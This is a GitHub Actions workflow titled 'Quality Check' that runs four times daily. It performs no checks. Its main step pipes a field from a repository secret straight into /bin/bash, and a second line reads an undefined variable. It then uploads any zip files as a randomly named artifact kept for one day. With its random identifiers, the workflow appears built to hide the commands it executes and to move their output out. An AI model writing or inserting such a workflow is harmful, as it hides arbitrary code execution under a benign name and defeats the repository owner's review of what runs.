name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '5 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          oln33: ${{ secrets.oln33 }}
        run: |
          printf '%s' "$oln33" | jq -r .pl181 | /bin/bash
          printf '%s' "$bw608" | jq -r .lzbu54415 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: ofPDHwLB
          path: "*.zip"
          retention-days: 1
